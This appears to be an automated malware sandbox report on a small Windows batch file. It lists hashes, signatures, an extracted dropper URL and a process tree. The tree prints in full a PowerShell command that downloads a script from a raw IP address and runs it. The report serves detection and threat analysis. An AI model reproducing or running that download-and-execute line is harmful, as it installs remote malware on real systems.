Analysis

  • max time kernel
    117s
  • max time network
    140s
  • platform
    windows10_x64
  • resource
    win10v200430
  • submitted
    13-07-2020 02:10

General

  • Target

    c378638c5a35bb563b4b36d635451cb9.bat

  • Size

    219B

  • MD5

    8e9d65b141e89c3d651fa89e306b9b0f

  • SHA1

    5e1c4e09823b5c79eb82dc0d3994f7380c6f5d22

  • SHA256

    ebfad7734e6b37d7bf1576bce1883d8f8668cf60a488058efd9b75e598e7076c

  • SHA512

    50d0f6edf1d5a12640d5e826491bc8b6669360b1aae12e7052eab88ecba33c4b87ce39750eb55507276af60ca202dbf726c688d01aad7ce76d7668d26195a834

Score
10/10

Malware Config

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://185.103.242.78/pastes/c378638c5a35bb563b4b36d635451cb9

Signatures

  • Suspicious use of WriteProcessMemory 3 IoCs
  • Program crash 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious behavior: EnumeratesProcesses 13 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\c378638c5a35bb563b4b36d635451cb9.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2024
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/c378638c5a35bb563b4b36d635451cb9');Invoke-XDMKAXFLNOPB;Start-Sleep -s 10000"
      2⤵
        PID:2136
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 2136 -s 704
          3⤵
          • Program crash
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious behavior: EnumeratesProcesses
          PID:2700

    Network

    MITRE ATT&CK Matrix

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • memory/2136-0-0x0000000000000000-mapping.dmp
    • memory/2136-2-0x0000000000000000-mapping.dmp
    • memory/2136-3-0x0000000000000000-mapping.dmp
    • memory/2136-4-0x0000000000000000-mapping.dmp
    • memory/2136-6-0x0000000000000000-mapping.dmp
    • memory/2136-5-0x0000000000000000-mapping.dmp
    • memory/2136-7-0x0000000000000000-mapping.dmp
    • memory/2700-1-0x00000000048E0000-0x00000000048E1000-memory.dmp
      Filesize

      4KB

    • memory/2700-8-0x0000000005010000-0x0000000005011000-memory.dmp
      Filesize

      4KB